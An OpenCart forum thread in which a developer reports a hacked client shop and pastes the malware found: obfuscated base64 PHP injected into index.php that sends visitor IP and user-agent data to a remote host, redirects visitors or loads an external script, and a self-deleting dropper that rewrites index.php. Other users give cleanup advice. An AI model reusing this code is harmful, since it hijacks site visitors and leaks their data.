Post by briciu » Sat Mar 07, 2020 6:59 pm

One of a client's sites was hacked ! the file index.php from root folder has been modified by adding the following php extra code:

Code: Select all

<?php /* update */

if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {

	$referer = $_SERVER['HTTP_REFERER'];

	$user=$_SERVER["HTTP_USER_AGENT"];

	$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');

	$b1223oghhmtjhms = base64_decode('QWRzQm90LUdvb2dsZXxBaHJlZnNCb3QvfEFwYWNoZS1IdHRwQ2xpZW50L3xCYWlkdXNwaWRlci98Q05DYXQvfERldVN1L3xEb3RCb3QvfEdvb2dsZSBmYXZpY29ufEdvb2dsZS1TaXRlLVZlcmlmaWNhdGlvbi98R29vZ2xlYm90LUltYWdlLzEuMHxHb29nbGVib3QvfEdyYXBlc2hvdENyYXdsZXIvfEd1enpsZUh0dHAvfEphdmEvMS58TGlua1N0YXRzIHxMaW5rcGFkQm90L3xMaW5rc01hc3RlclJvQm90L3xNSjEyYm90L3xNYWlsLlJVX0JvdC98TWVnYUluZGV4LnJ1L3xOZXRTZWVyIGNyYXdsZXIvfE5ldGNhdCBCb3R8T2RrbEJvdC98UmlkZGxlcnxSb29rZWVCb3R8UnVuZXQtUmVzZWFyY2gtQ3Jhd2xlcnxTZW1ydXNoQm90L3xTZW9wdWx0Q29udGVudEFuYWx5emVyfFNwdXRuaWtGYXZpY29uQm90L3xTdGF0T25saW5lUnVCb3QvfFN1cnZleUJvdC98VmFsaWRhdG9yLm51L3xXM0NfVmFsaWRhdG9yL3xXZWItTW9uaXRvcmluZy98V2ViQXJ0ZXhCb3R8V2Vic3F1YXNoLmNvbXxZIUotQVNSL3xZYURpcmVjdEZldGNoZXIvfFlhaG9vISBTbHVycHxZYW5kZXgvfFlhbmRleEJvdC98WWFuZGV4RGlyZWN0L3xZYW5kZXhJbWFnZXMvfFlhbmRleE1ldHJpa2EvfFlhbmRleE1vYmlsZUJvdC98WWFuZGV4V2VibWFzdGVyL3xhcmNoaXZlLm9yZ19ib3R8YmluZ2JvdC98Ym90L051dGNoLXxlU3luZGlDYXQgQm90fGZhY2Vib29rZXh0ZXJuYWxoaXQvfHBlYXIucGhwLm5ldHxsaW5rZGV4Ym90L3xsdHg3MXxtZWFucGF0aGJvdC98bmV0RXN0YXRlfG9wZW5zdGF0LnJ1L3xwYXJzZXIzfHByLWN5LnJ1fHB5dGhvbi1yZXF1ZXN0cy98cm9nZXJib3QvfHN0YXRkb20ucnUvfHRyZW5kaWN0aW9ufFBIUC98dmtTaGFyZXxDVUJPVF9OT1RFX1N8R29vZ2xlYm90L3xBZHNCb3QtR29vZ2xlfFRrQm90L3xZYW5kZXhBbnRpdmlydXN8TWFpbC5SVV9Cb3Q');

	$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');

	$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];

	if (preg_match("/(".$white_engine_search.")/i" , $referer)){

		$oc = explode('|',$b1223oghhmtjhms);

		foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}

		setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");

		$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");

		function v64547f9857d8dc65(){

			global $v634894f9845d8dc65;

			$dats = 1;

			if(function_exists('curl_version')){

				$kd88fc6edf21ea464 = curl_init();

				curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);

				curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));

				curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));

				curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);

				$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);

				curl_close($kd88fc6edf21ea464);

				$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);

				if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {

					return $ke4e46deb7f9cc58c;

				}else{

					return $dats;

				}

			}else{

				$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));

				$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);

				if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {

					return $ke4e46deb7f9cc58c;

				}else{

					return $dats;

				}	

			}

			return false;

		}

		if (!empty($_SERVER['HTTP_CLIENT_IP'])){

			$ip = $_SERVER['HTTP_CLIENT_IP'];

		}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

			$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

		}else{

			$ip = $_SERVER['REMOTE_ADDR'];

		}

		$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];

		$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));

		$m9b207167e5381c47 = v64547f9857d8dc65();

		if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {

			$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;

			header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);

		}else{

			$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');

			$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');

			$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];

			echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";

			exit;

		}

	}

} /* update */ ?><?php /* update */

if(isset($_SERVER['HTTP_REFERER']) && !isset($_COOKIE['dataserk']) && isset($_SERVER["HTTP_USER_AGENT"])) {

	$referer = $_SERVER['HTTP_REFERER'];

	$user=$_SERVER["HTTP_USER_AGENT"];

	$white_engine_search = base64_decode('Z29vZ2xlfGJpbmd8eWFuZGV4fGJhaWR1fHlhaG9vfGR1Y2tkdWNrZ298YXNrfG1haWwuY3xtYWlsLnJ8bGl2ZWludGVybmV0fG15c3BhY2V8dHVtYmxyfGhvdG1haWx8Z21haWx8b3JhbmdlfGdteHxhb2w');

	$b1223oghhmtjhms = base64_decode('QWRzQm90LUdvb2dsZXxBaHJlZnNCb3QvfEFwYWNoZS1IdHRwQ2xpZW50L3xCYWlkdXNwaWRlci98Q05DYXQvfERldVN1L3xEb3RCb3QvfEdvb2dsZSBmYXZpY29ufEdvb2dsZS1TaXRlLVZlcmlmaWNhdGlvbi98R29vZ2xlYm90LUltYWdlLzEuMHxHb29nbGVib3QvfEdyYXBlc2hvdENyYXdsZXIvfEd1enpsZUh0dHAvfEphdmEvMS58TGlua1N0YXRzIHxMaW5rcGFkQm90L3xMaW5rc01hc3RlclJvQm90L3xNSjEyYm90L3xNYWlsLlJVX0JvdC98TWVnYUluZGV4LnJ1L3xOZXRTZWVyIGNyYXdsZXIvfE5ldGNhdCBCb3R8T2RrbEJvdC98UmlkZGxlcnxSb29rZWVCb3R8UnVuZXQtUmVzZWFyY2gtQ3Jhd2xlcnxTZW1ydXNoQm90L3xTZW9wdWx0Q29udGVudEFuYWx5emVyfFNwdXRuaWtGYXZpY29uQm90L3xTdGF0T25saW5lUnVCb3QvfFN1cnZleUJvdC98VmFsaWRhdG9yLm51L3xXM0NfVmFsaWRhdG9yL3xXZWItTW9uaXRvcmluZy98V2ViQXJ0ZXhCb3R8V2Vic3F1YXNoLmNvbXxZIUotQVNSL3xZYURpcmVjdEZldGNoZXIvfFlhaG9vISBTbHVycHxZYW5kZXgvfFlhbmRleEJvdC98WWFuZGV4RGlyZWN0L3xZYW5kZXhJbWFnZXMvfFlhbmRleE1ldHJpa2EvfFlhbmRleE1vYmlsZUJvdC98WWFuZGV4V2VibWFzdGVyL3xhcmNoaXZlLm9yZ19ib3R8YmluZ2JvdC98Ym90L051dGNoLXxlU3luZGlDYXQgQm90fGZhY2Vib29rZXh0ZXJuYWxoaXQvfHBlYXIucGhwLm5ldHxsaW5rZGV4Ym90L3xsdHg3MXxtZWFucGF0aGJvdC98bmV0RXN0YXRlfG9wZW5zdGF0LnJ1L3xwYXJzZXIzfHByLWN5LnJ1fHB5dGhvbi1yZXF1ZXN0cy98cm9nZXJib3QvfHN0YXRkb20ucnUvfHRyZW5kaWN0aW9ufFBIUC98dmtTaGFyZXxDVUJPVF9OT1RFX1N8R29vZ2xlYm90L3xBZHNCb3QtR29vZ2xlfFRrQm90L3xZYW5kZXhBbnRpdmlydXN8TWFpbC5SVV9Cb3Q');

	$efkbgmkbmghln=array('ZHNma2pna2pudmtzZG52Y2pkZmJ2amguaW5mbw');

	$efkbgmkbmghln=$efkbgmkbmghln[array_rand($efkbgmkbmghln)];

	if (preg_match("/(".$white_engine_search.")/i" , $referer)){

		$oc = explode('|',$b1223oghhmtjhms);

		foreach($oc as $val){if(strpos($user,$val) !== FALSE){setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/"); break;}}

		setcookie("dataserk","vitedid6fe1d0be634",time()+2592000, "/");

		$ed6fe1d0be6347b8e = base64_decode("L2luZGV4Lz83NTYxNTc2MjY1MTI0");

		function v64547f9857d8dc65(){

			global $v634894f9845d8dc65;

			$dats = 1;

			if(function_exists('curl_version')){

				$kd88fc6edf21ea464 = curl_init();

				curl_setopt($kd88fc6edf21ea464, CURLOPT_RETURNTRANSFER, true);

				curl_setopt($kd88fc6edf21ea464, CURLOPT_USERAGENT, base64_decode('bmV3cmVxdWVzdA=='));

				curl_setopt($kd88fc6edf21ea464, CURLOPT_URL, base64_decode($v634894f9845d8dc65));

				curl_setopt($kd88fc6edf21ea464, CURLOPT_TIMEOUT, 10);

				$mb4a88417b3d0170d = curl_exec($kd88fc6edf21ea464);

				curl_close($kd88fc6edf21ea464);

				$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);

				if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {

					return $ke4e46deb7f9cc58c;

				}else{

					return $dats;

				}

			}else{

				$mb4a88417b3d0170d = file_get_contents(base64_decode($v634894f9845d8dc65));

				$ke4e46deb7f9cc58c = json_decode($mb4a88417b3d0170d, true);

				if ($ke4e46deb7f9cc58c[base64_decode('ZG9tYWlu') ]) {

					return $ke4e46deb7f9cc58c;

				}else{

					return $dats;

				}	

			}

			return false;

		}

		if (!empty($_SERVER['HTTP_CLIENT_IP'])){

			$ip = $_SERVER['HTTP_CLIENT_IP'];

		}elseif(!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {

			$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

		}else{

			$ip = $_SERVER['REMOTE_ADDR'];

		}

		$gnjkhkgjfhkhh = $ip.'|'.$user.'|'.$_SERVER['SERVER_NAME'].'|'.time().'|'.$_SERVER['HTTP_REFERER'];

		$v634894f9845d8dc65 = base64_encode(base64_decode('aHR0cDovLw').base64_decode($efkbgmkbmghln).base64_decode('Lz9wYXJhbXM9').base64_encode($gnjkhkgjfhkhh));

		$m9b207167e5381c47 = v64547f9857d8dc65();

		if ($m9b207167e5381c47[base64_decode('ZG9tYWlu') ]) {

			$ye617ef6974faced4 = base64_decode('aHR0cDovLw==') . $m9b207167e5381c47[base64_decode('ZG9tYWlu') ] . $ed6fe1d0be6347b8e;

			header(base64_decode('TG9jYXRpb246IA==') . $ye617ef6974faced4);

		}else{

			$sitesjs = base64_decode('aHR0cHM6Ly9hc3RhbnRoZW1pLnRrL3RtcC5qcw');

			$letters = array('a','s','d','f','g','h','j','k','l','z','x','c','v','b','n','m','q','w','e');

			$letters = $letters[array_rand($letters)].$letters[array_rand($letters)];

			echo "<html><head></head><body><script>var elemsa$letters = document.createElement(\"script\"); elemsa$letters.src = '$sitesjs'; document.head.appendChild(elemsa$letters);</script></body></html>";

			exit;

		}

	}

} /* update */ ?>


After checking the logs I discovered this:

Code: Select all

[28/Feb/2020:10:56:53 +0200] "POST /catalog/controller/affiliate/image.php HTTP/1.1" 200 41 "*****.com/catalog/controller/affiliate/image.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
This file may have a vulnerability !
A file named config_old.php is created in the admin folder, the file that modifies the index.php file in the root. The code inserted in index.php causes users to be redirected to malicious sites!
The attacker used the application installed on the server to access unauthorized site files and to infect them.Instead of uploading an image to the server for editing, it sent a malicious code encoded through base64, which then automatically renamed it to conf_old.php then infected index.php

config_old.php content

Code: Select all

<?php

$dt = base64_decode('PD9waHAgLyogdXBkYXRlICovDQppZihpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pICYmICFpc3NldCgkX0NPT0tJRVsnZGF0YXNlcmsnXSkgJiYgaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKSkgew0KCSRyZWZlcmVyID0gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddOw0KCSR1c2VyPSRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXTsNCgkkd2hpdGVfZW5naW5lX3NlYXJjaCA9IGJhc2U2NF9kZWNvZGUoJ1oyOXZaMnhsZkdKcGJtZDhlV0Z1WkdWNGZHSmhhV1IxZkhsaGFHOXZmR1IxWTJ0a2RXTnJaMjk4WVhOcmZHMWhhV3d1WTN4dFlXbHNMbko4ZEdWc1pXZHlZVzE4YkdsMlpXbHVkR1Z5Ym1WMGZIZGxZMmhoZEh4dGVYTndZV05sZkhSMWJXSnNjbnhzYVc1clpXUnBibnh5WldSa2FYUjhjR2x1ZEdWeVpYTjBmSFIzYVhSMFpYSjhhVzV6ZEdGbmNtRnRmR1poWTJWaWIyOXJmSFpyTG1OOGFHOTBiV0ZwYkh4bmJXRnBiSHh2Y21GdVoyVjhiMnN1Y25WOFoyMTRmR0Z2YkEnKTsNCgkkYjEyMjNvZ2hobXRqaG1zID0gYmFzZTY0X2RlY29kZSgnUVdSelFtOTBMVWR2YjJkc1pYeEJhSEpsWm5OQ2IzUXZmRUZ3WVdOb1pTMUlkSFJ3UTJ4cFpXNTBMM3hDWVdsa2RYTndhV1JsY2k5OFEwNURZWFF2ZkVSbGRWTjFMM3hFYjNSQ2IzUXZmRWR2YjJkc1pTQm1ZWFpwWTI5dWZFZHZiMmRzWlMxVGFYUmxMVlpsY21sbWFXTmhkR2x2Ymk5OFIyOXZaMnhsWW05MExVbHRZV2RsTHpFdU1IeEhiMjluYkdWaWIzUXZmRWR5WVhCbGMyaHZkRU55WVhkc1pYSXZmRWQxZW5wc1pVaDBkSEF2ZkVwaGRtRXZNUzU4VEdsdWExTjBZWFJ6SUh4TWFXNXJjR0ZrUW05MEwzeE1hVzVyYzAxaGMzUmxjbEp2UW05MEwzeE5TakV5WW05MEwzeE5ZV2xzTGxKVlgwSnZkQzk4VFdWbllVbHVaR1Y0TG5KMUwzeE9aWFJUWldWeUlHTnlZWGRzWlhJdmZFNWxkR05oZENCQ2IzUjhUMlJyYkVKdmRDOThVbWxrWkd4bGNueFNiMjlyWldWQ2IzUjhVblZ1WlhRdFVtVnpaV0Z5WTJndFEzSmhkMnhsY254VFpXMXlkWE5vUW05MEwzeFRaVzl3ZFd4MFEyOXVkR1Z1ZEVGdVlXeDVlbVZ5ZkZOd2RYUnVhV3RHWVhacFkyOXVRbTkwTDN4VGRHRjBUMjVzYVc1bFVuVkNiM1F2ZkZOMWNuWmxlVUp2ZEM5OFZtRnNhV1JoZEc5eUxtNTFMM3hYTTBOZlZtRnNhV1JoZEc5eUwzeFhaV0l0VFc5dWFYUnZjbWx1Wnk5OFYyVmlRWEowWlhoQ2IzUjhWMlZpYzNGMVlYTm9MbU52Ylh4WklVb3RRVk5TTDN4WllVUnBjbVZqZEVabGRHTm9aWEl2ZkZsaGFHOXZJU0JUYkhWeWNIeFpZVzVrWlhndmZGbGhibVJsZUVKdmRDOThXV0Z1WkdWNFJHbHlaV04wTDN4WllXNWtaWGhKYldGblpYTXZmRmxoYm1SbGVFMWxkSEpwYTJFdmZGbGhibVJsZUUxdlltbHNaVUp2ZEM5OFdXRnVaR1Y0VjJWaWJXRnpkR1Z5TDN4aGNtTm9hWFpsTG05eVoxOWliM1I4WW1sdVoySnZkQzk4WW05MEwwNTFkR05vTFh4bFUzbHVaR2xEWVhRZ1FtOTBmR1poWTJWaWIyOXJaWGgwWlhKdVlXeG9hWFF2ZkhCbFlYSXVjR2h3TG01bGRIeHNhVzVyWkdWNFltOTBMM3hzZEhnM01YeHRaV0Z1Y0dGMGFHSnZkQzk4Ym1WMFJYTjBZWFJsZkc5d1pXNXpkR0YwTG5KMUwzeHdZWEp6WlhJemZIQnlMV041TG5KMWZIQjVkR2h2YmkxeVpYRjFaWE4wY3k5OGNtOW5aWEppYjNRdmZITjBZWFJrYjIwdWNuVXZmSFJ5Wlc1a2FXTjBhVzl1ZkZCSVVDOThkbXRUYUdGeVpRJyk7DQoJJGVma2JnbWtibWdobG49YXJyYXkoJ2RHaGxlR1ppWm1kaWFHNXFiV3BxWm1kaVltUm1kbVpuTG1sdVptOCcpOw0KCSRlZmtiZ21rYm1naGxuPSRlZmtiZ21rYm1naGxuW2FycmF5X3JhbmQoJGVma2JnbWtibWdobG4pXTsNCglpZiAocHJlZ19tYXRjaCgiLygiLiR3aGl0ZV9lbmdpbmVfc2VhcmNoLiIpL2kiICwgJHJlZmVyZXIpKXsNCgkJJG9jID0gZXhwbG9kZSgnfCcsJGIxMjIzb2doaG10amhtcyk7DQoJCWZvcmVhY2goJG9jIGFzICR2YWwpe2lmKHN0cnBvcygkdXNlciwkdmFsKSAhPT0gRkFMU0Upe3NldGNvb2tpZSgiZGF0YXNlcmsiLCJ2aXRlZGlkNmZlMWQwYmU2MzQiLHRpbWUoKSsyNTkyMDAwLCAiLyIpOyBicmVhazt9fQ0KCQlzZXRjb29raWUoImRhdGFzZXJrIiwidml0ZWRpZDZmZTFkMGJlNjM0Iix0aW1lKCkrMjU5MjAwMCwgIi8iKTsNCgkJJGVkNmZlMWQwYmU2MzQ3YjhlID0gYmFzZTY0X2RlY29kZSgiTDJsdVpHVjRMejgzTlRZeE5UYzJNalkxTVRJMCIpOw0KCQlmdW5jdGlvbiB2NjQ1NDdmOTg1N2Q4ZGM2NSgpew0KCQkJZ2xvYmFsICR2NjM0ODk0Zjk4NDVkOGRjNjU7DQoJCQlpZihmdW5jdGlvbl9leGlzdHMoJ2N1cmxfdmVyc2lvbicpKXsNCgkJCQkka2Q4OGZjNmVkZjIxZWE0NjQgPSBjdXJsX2luaXQoKTsNCgkJCQljdXJsX3NldG9wdCgka2Q4OGZjNmVkZjIxZWE0NjQsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOw0KCQkJCWN1cmxfc2V0b3B0KCRrZDg4ZmM2ZWRmMjFlYTQ2NCwgQ1VSTE9QVF9VU0VSQUdFTlQsIGJhc2U2NF9kZWNvZGUoJ2JtVjNjbVZ4ZFdWemRBPT0nKSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1VSTCwgYmFzZTY0X2RlY29kZSgkdjYzNDg5NGY5ODQ1ZDhkYzY1KSk7DQoJCQkJY3VybF9zZXRvcHQoJGtkODhmYzZlZGYyMWVhNDY0LCBDVVJMT1BUX1RJTUVPVVQsIDEwKTsNCgkJCQkkbWI0YTg4NDE3YjNkMDE3MGQgPSBjdXJsX2V4ZWMoJGtkODhmYzZlZGYyMWVhNDY0KTsNCgkJCQljdXJsX2Nsb3NlKCRrZDg4ZmM2ZWRmMjFlYTQ2NCk7DQoJCQkJJGtlNGU0NmRlYjdmOWNjNThjID0ganNvbl9kZWNvZGUoJG1iNGE4ODQxN2IzZDAxNzBkLCB0cnVlKTsNCgkJCQlpZiAoJGtlNGU0NmRlYjdmOWNjNThjW2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSkgew0KCQkJCQlyZXR1cm4gJGtlNGU0NmRlYjdmOWNjNThjOw0KCQkJCX0NCgkJCX1lbHNlew0KCQkJCSRtYjRhODg0MTdiM2QwMTcwZCA9IGZpbGVfZ2V0X2NvbnRlbnRzKGJhc2U2NF9kZWNvZGUoJHY2MzQ4OTRmOTg0NWQ4ZGM2NSkpOw0KCQkJCSRrZTRlNDZkZWI3ZjljYzU4YyA9IGpzb25fZGVjb2RlKCRtYjRhODg0MTdiM2QwMTcwZCwgdHJ1ZSk7DQoJCQkJaWYgKCRrZTRlNDZkZWI3ZjljYzU4Y1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCQkJcmV0dXJuICRrZTRlNDZkZWI3ZjljYzU4YzsNCgkJCQl9CQkNCgkJCX0NCgkJCXJldHVybiBmYWxzZTsNCgkJfQ0KCQlpZiAoIWVtcHR5KCRfU0VSVkVSWydIVFRQX0NMSUVOVF9JUCddKSl7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9DTElFTlRfSVAnXTsNCgkJfWVsc2VpZighZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfRk9SJ10pKSB7DQoJCQkkaXAgPSAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9GT1InXTsNCgkJfWVsc2V7DQoJCQkkaXAgPSAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTsNCgkJfQ0KCQkkZ25qa2hrZ2pmaGtoaCA9ICRpcC4nfCcuJHVzZXIuJ3wnLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLid8Jy50aW1lKCkuJ3wnLiRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCgkJJHY2MzQ4OTRmOTg0NWQ4ZGM2NSA9IGJhc2U2NF9lbmNvZGUoYmFzZTY0X2RlY29kZSgnYUhSMGNEb3ZMdycpLmJhc2U2NF9kZWNvZGUoJGVma2JnbWtibWdobG4pLmJhc2U2NF9kZWNvZGUoJ0x6OXdZWEpoYlhNOScpLmJhc2U2NF9lbmNvZGUoJGduamtoa2dqZmhraGgpKTsNCgkJJG05YjIwNzE2N2U1MzgxYzQ3ID0gdjY0NTQ3Zjk4NTdkOGRjNjUoKTsNCgkJaWYgKCRtOWIyMDcxNjdlNTM4MWM0N1tiYXNlNjRfZGVjb2RlKCdaRzl0WVdsdScpIF0pIHsNCgkJCSR5ZTYxN2VmNjk3NGZhY2VkNCA9IGJhc2U2NF9kZWNvZGUoJ2FIUjBjRG92THc9PScpIC4gJG05YjIwNzE2N2U1MzgxYzQ3W2Jhc2U2NF9kZWNvZGUoJ1pHOXRZV2x1JykgXSAuICRlZDZmZTFkMGJlNjM0N2I4ZTsNCgkJCWhlYWRlcihiYXNlNjRfZGVjb2RlKCdURzlqWVhScGIyNDZJQT09JykgLiAkeWU2MTdlZjY5NzRmYWNlZDQpOw0KCQl9DQoJfQ0KfSAvKiB1cGRhdGUgKi8gPz4');

$path = $_SERVER['DOCUMENT_ROOT'];

$path = rtrim($path, '/');

if(file_exists($path.'/index.php')){

	$dts = file_get_contents($path.'/index.php');

	if(strpos($dts,'global $v634894f9845d8dc65') !== false){

		$dtss = explode('} /* update */ ?>',$dts);

		if(isset($dtss[1]) && strpos($dtss[1],'global $v634894f9845d8dc65') === false){

			$dts = $dtss[1];

		}elseif(isset($dtss[2]) && strpos($dtss[2],'global $v634894f9845d8dc65') === false){

			$dts = $dtss[2];

		}elseif(isset($dtss[3]) && strpos($dtss[3],'global $v634894f9845d8dc65') === false){

			$dts = $dtss[3];

		}elseif(isset($dtss[4]) && strpos($dtss[4],'global $v634894f9845d8dc65') === false){

			$dts = $dtss[4];

		}else{

			$dts = '';

		}

	}

	$dts = $dt.$dts;

	file_put_contents($path.'/index.php', $dts);

}

$path = dirname(__FILE__);

$filename = $_SERVER['PHP_SELF'];

$fp = fopen($_SERVER['PHP_SELF'], 'w+');

if(file_exists($_SERVER['SCRIPT_FILENAME'])){

	unlink($_SERVER['SCRIPT_FILENAME']);

}

if(file_exists(__FILE__)){

	unlink(__FILE__);	

}

?>
This type of vulnerability has already been reported by other developers!
https://www.imunify360.com/blog/malware ... -processor
Last edited by straightlight on Sat Mar 07, 2020 7:16 pm, edited 1 time in total.

Newbie

Posts

Joined
Sat Aug 25, 2018 5:21 am

Post by xxvirusxx » Sat Mar 07, 2020 7:51 pm

You need to post more info...

What version of Opencart?
What PHP version ?
On same server was another Wordpress wbsite?
FTP password like this? 12345 or JH%$^%$%^FHGAHG ?
........

Upgrade Service | OC 2.3.0.2 PHP 8 | My Custom OC 3.0.3.8 | Buy me a beer


User avatar
Expert Member

Posts

Joined
Tue Jul 17, 2012 10:35 pm
Location - România

Post by OSWorX » Sat Mar 07, 2020 7:54 pm

Fine .. and now?
What do you think shall we do?

I suggest you make your "homework" first.
That start in having NO other CMS, Shopsystems, etc. on the same server or under the same account.
In particular NO Wordpress.
Only OpenCart - and your shop is safe.

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by straightlight » Sat Mar 07, 2020 8:04 pm

While the above replies have valid points, regarding platform security, also ensure to mention to your client to report this issue to his host and the change to his host and platforms password accounts access.

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by OSWorX » Sat Mar 07, 2020 8:49 pm

straightlight wrote:
Sat Mar 07, 2020 8:04 pm
While the above replies have valid points, regarding platform security, also ensure to report this issue to your host and to change your host and platforms password accounts access.
If that can be read:
RusSergiu wrote:
Sat Mar 07, 2020 6:59 pm
One of a client's sites was hacked ..
it has to be suggested, that this guy should know what to do and what could cause this hack.

But in general: with such less informations, pointing to a useless Wordpress security issue and mentioning OpenCart in the same way, looks not very serious!

Full Stack Web Developer :: Dedicated OpenCart Development & Support DACH Region
Contact for Custom Work / Fast Support.


User avatar
Guru Member

Posts

Joined
Mon Jan 11, 2010 10:52 pm
Location - Austria

Post by straightlight » Sat Mar 07, 2020 8:58 pm

Right. I modified 'your' to 'his' on my previous post.

Dedication and passion goes to those who are able to push and merge a project.

Regards,
Straightlight
Programmer / Opencart Tester


Legendary Member

Posts

Joined
Mon Nov 14, 2011 11:38 pm
Location - Canada, ON

Post by IP_CAM » Sat Mar 07, 2020 10:01 pm

Well, it would probably be more of help, to tell the folks, which file(s)
should be tested on https://www.virustotal.com/ , to make sure, that
no problem exists. I checked my index.php file and the system/.../ image.php,
but I cannot test every file, just to find out about ... :laugh:

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by xxvirusxx » Sun Mar 08, 2020 1:37 am

OSWorX wrote:
Sat Mar 07, 2020 8:49 pm
it has to be suggested, that this guy should know what to do and what could cause this hack.
Of course. Should know how to improve security when make websites for companies. And how to fix that vulnerability from image.php :laugh: :laugh: :laugh: :laugh:

You have been hacked :laugh: :laugh:

Upgrade Service | OC 2.3.0.2 PHP 8 | My Custom OC 3.0.3.8 | Buy me a beer


User avatar
Expert Member

Posts

Joined
Tue Jul 17, 2012 10:35 pm
Location - România

Post by ADD Creative » Sun Mar 08, 2020 5:54 am

RusSergiu wrote:
Sat Mar 07, 2020 6:59 pm
After checking the logs I discovered this:

Code: Select all

[28/Feb/2020:10:56:53 +0200] "POST /catalog/controller/affiliate/image.php HTTP/1.1" 200 41 "*****.com/catalog/controller/affiliate/image.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
This file may have a vulnerability !

This type of vulnerability has already been reported by other developers!
https://www.imunify360.com/blog/malware ... -processor
It's not a case of that that file may have a vulnerability, if you read the article you posted a link to, that file is actually a piece of malware. It's not part of OpenCart so has been placed there by an attacker.

If you haven't already, change all the passwords. Remove any files that are not part of a clean OpenCart install, including the files you mention.
Check your FTP access logs to see if there is a record of that file being uploaded.
Make sure you are not running any other web applications on the same hosting.
Make sure you are not running any extensions that could have a vulnerability.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by briciu » Mon Mar 09, 2020 7:52 pm

You're right!Actually, that image.php file was placed there by the hacker! Oc 3.0.2 , journal theme ! The passwords have been changed and the respective files have been deleted! And yes, there is a wordpress blog installed on the same server!

Newbie

Posts

Joined
Sat Aug 25, 2018 5:21 am

Post by ADD Creative » Mon Mar 09, 2020 10:12 pm

Have you worked out how that file was placed on your server? Because it's not unusual for an attacker to try again.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by OSWorX » Mon Mar 09, 2020 11:59 pm

RusSergiu wrote:
Mon Mar 09, 2020 7:52 pm
